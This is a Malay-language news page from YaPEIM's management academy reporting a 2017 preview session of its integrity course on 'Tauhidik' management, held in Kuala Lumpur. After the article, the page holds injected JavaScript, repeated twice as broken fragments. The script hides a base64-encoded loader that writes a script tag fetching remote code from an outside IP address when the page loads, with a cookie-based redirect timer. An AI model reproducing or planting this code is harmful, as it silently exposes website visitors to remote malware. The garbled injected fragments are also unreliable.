YaPEIM » PREVIEW KURSUS INTEGRITI : MODUL PENGURUSAN TAUHIDIK

Terkini

PREVIEW KURSUS INTEGRITI : MODUL PENGURUSAN TAUHIDIK

Program ini merupakan salah satu usaha AKADEMI bagi memperkenalkan kursus-kursus yang ditawarkan seperti kursus Modul Pengurusan Tauhidik.

PROGRAM PREVIEW KURSUS INTEGRITI: MODUL PENGURUSAN TAUHIDIK
13 NOVEMBER 2017 / 24 SAFAR 1439
DEWAN UTAMA YaPEIM, TINGKAT 7 GRAND SEASON AVENUE, KUALA LUMPUR

13 NOVEMBER 2017 – KUALA LUMPUR- Akademi Pengurusan YaPEIM (AKADEMI) yang merupakan institusi milik penuh Yayasan Pembangunan Ekonomi Islam Malaysia (YaPEIM) telah menganjurkan Program Preview Kursus Integriti: Modul Pengurusan Tauhidik.

AKADEMI berperanan untuk membangun, mengembang dan memasyarakatkan ilmu dan amalan pengurusan berlandaskan Al-Quran dan as-Sunnah. Pendekatan untuk menjayakan matlamat ini adalah pelbagai melalui penyelidikan, pengkaryaan, penganjuran program seperti latihan dan mewujudkan jaringan dan landasan kerjasama dengan tokoh ilmuan dan pengamal Pengurusan Islami dan pengurusan lazim.

Program ini merupakan salah satu usaha AKADEMI bagi memperkenalkan kursus-kursus yang ditawarkan seperti kursus Modul Pengurusan Tauhidik. Kursus ini adalah satu kursus yang dibangunkan oleh Panel AKADEMI sebagai satu produk ulung dan merupakan input utama kepada golongan Eksekutif dan para petugas dalam sektor pengurusan khasnya dan kelompok masyarakat amnya.

Program preview ini berlangsung selama setengah hari dan telah dirasmikan oleh Mufti Wilayah Persekutuan Kuala Lumpur, Sahibus Samahah Datuk Dr. Zulkifli Mohamad Al-Bakri. Turut hadir ialah Lembaga Pemegang Amanah AKADEMI, Dato’ Shahlan Ismail.

Program diteruskan dengan preview kursus yang disampaikan oleh Tn. Hj. Jaafar Muhammad, Master trainer AKADEMI.

Program ini adalah julung-julung kali dianjurkan oleh AKADEMI dan telah dihadiri seramai lebih 40 orang yang terdiri daripada pegawai-pegawai kanan daripada badan-badan kerajaan dan swasta.

([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top